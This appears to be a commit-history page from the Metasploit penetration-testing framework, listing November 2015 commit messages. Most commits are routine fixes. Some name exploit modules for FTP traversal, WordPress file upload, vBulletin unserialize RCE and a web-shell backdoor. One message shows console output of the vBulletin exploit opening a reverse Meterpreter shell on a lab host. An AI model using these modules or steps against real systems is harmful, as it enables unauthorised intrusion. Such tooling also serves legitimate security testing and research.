Commit Graph

36165 Commits (6c319469959f32ad4c542874de38e665db85622b)

Author SHA1 Message Date
Jon Hart 8f86b2519f
Resolve 'duplicate key warning' for some modules 2015-11-09 18:40:32 -08:00
William Vu 2f362aec69
Land #6215, Payload/Compat hash fixes 2015-11-09 16:23:38 -06:00
HD Moore f86f427d54 Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00
Chris Doughty f8a215e3cd Adding changes to allow for easier version bumping 2015-11-09 15:56:03 -06:00
wvu-r7 8e5adfd79b Fix broken 50/72 rule link 2015-11-09 13:13:45 -06:00
William Vu e6202e3eda Revert "Land #6060, Gemfile/gemspec updates"
This reverts commit 8f4046da40, reversing
changes made to 2df149b0a5.
2015-11-08 19:32:15 -06:00
William Vu 3e588ffd62
Land #6202, unbalanced angle brackets fixes 2015-11-08 16:26:34 -06:00
William Vu 8f4046da40
Land #6060, Gemfile/gemspec updates 2015-11-08 16:08:08 -06:00
JT e019aa12a0 Update pcman_ftp_traversal.rb 2015-11-08 13:40:23 +08:00
JT f60f2336e3 Update bison_ftp_traversal.rb 2015-11-08 13:39:32 +08:00
JT be85e85d40 Create bison_ftp_traversal.rb 2015-11-08 13:34:10 +08:00
JT bb78025dde Update pcman_ftp_traversal.rb 2015-11-08 13:27:45 +08:00
JT bf362be0a4 Update pcman_ftp_traversal.rb 2015-11-08 13:17:57 +08:00
JT bb9e820372 Create pcman_ftp_traversal.rb
Adding CVE-2015-7601
2015-11-08 13:08:23 +08:00
fraf0 970c5da9a6 Update dns_srv_enum.rb 2015-11-07 20:01:26 +01:00
fraf0 730f6b2326 Update dns_srv_enum.rb
Remove some comment following message on pull-request.
2015-11-07 15:23:32 +01:00
jvoisin e2678af0fe The modules now works on 5.1.X and 5.0.X
- Added automatic targeting
- Added support for 5.0.X
2015-11-07 14:28:25 +01:00
wchen-r7 0cc8165b52 And I forgot to rm the test line 2015-11-06 18:11:27 -06:00
wchen-r7 8f2a716306 I don't really need to override fail_with 2015-11-06 18:11:08 -06:00
wchen-r7 0213da3810 Handle more NilClass bugs 2015-11-06 18:08:51 -06:00
Jon Hart 43229c16e7
Correct some authors with unbalanced angle brackets 2015-11-06 13:24:58 -08:00
Jon Hart f34bf544d3
Update msftidy to flag authors with unbalanced angle brackets 2015-11-06 13:23:14 -08:00
William Vu 2df149b0a5
Land #6189, extraneous Content-Length fix 2015-11-06 14:36:40 -06:00
William Vu 3cae7999aa Prefer ctype over headers['Content-Type'] 2015-11-06 14:36:21 -06:00
Jon Hart f408bca3f0
More correct exception handling 2015-11-06 12:25:27 -08:00
jvazquez-r7 b01fac0e72
Land #6200, @wchen-r7's fix mixin usage on wp_ajax_load_more_file_upload 2015-11-06 14:06:35 -06:00
wchen-r7 f957acf9ba Fix Framework Rspec Failure
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
2015-11-06 13:56:05 -06:00
wchen-r7 fb9a40f15c
Land #6103, Add WordPress Plugin Ajax Load More Auth File Upload Vuln 2015-11-06 13:18:48 -06:00
wchen-r7 73f630b25a Note default.php 2015-11-06 13:18:24 -06:00
jvoisin f93f3397ec Fix some mistakes pointed by @wchen-r7 2015-11-06 19:35:22 +01:00
jvazquez-r7 ceaf7440a7 Send full message 2015-11-06 12:15:17 -06:00
jvazquez-r7 19652e79c3 Delete comments 2015-11-06 12:15:07 -06:00
jvazquez-r7 ca1502c00a Fix SMTP send_message to not block 2015-11-06 12:14:59 -06:00
Jon Hart 1473f2cfa7
More consistent printing 2015-11-06 10:03:06 -08:00
Jon Hart 7101ff2ecc
Better handling of motd printing 2015-11-06 09:52:12 -08:00
Jon Hart 55e224b7e7
Improve auth handling 2015-11-06 09:50:39 -08:00
Jon Hart fc97266588
Handle errors more carefully 2015-11-06 09:44:05 -08:00
Jon Hart d3ebb8ae93
Style cleanup of auth checking 2015-11-06 08:34:17 -08:00
jvoisin c540ca763c Add the EDB id 2015-11-06 17:21:28 +01:00
jvoisin 7998955b46 The double-quote character is a badchar 2015-11-06 16:43:53 +01:00
jvoisin 30e7a35452 Add the possibility to target non-default path 2015-11-06 15:33:30 +01:00
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
wchen-r7 46fac897bd
Land #6144, China Chopper Web Shell (Backdoor) module 2015-11-05 18:29:36 -06:00
wchen-r7 ea22583ed1 Update title and description 2015-11-05 18:29:03 -06:00
wchen-r7 27be832c4c remove the fail_with because it's always triggering anyway 2015-11-05 18:19:46 -06:00
dmohanty-r7 a71d7ae2ae
Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces 2015-11-05 16:56:41 -06:00
wchen-r7 038cb66937 Use the right module path 2015-11-05 16:16:46 -06:00
Louis Sato 5143da14f7
Land #6193, move msftidy to correct location 2015-11-05 15:42:16 -06:00
jvazquez-r7 20679ea6c6
Land #5720, @g0tmi1k's changes to firefox_creds post module 2015-11-05 15:36:08 -06:00
Louis Sato 9c347fbaae
Land #6195, remove ff buildid from os.js 2015-11-05 15:01:15 -06:00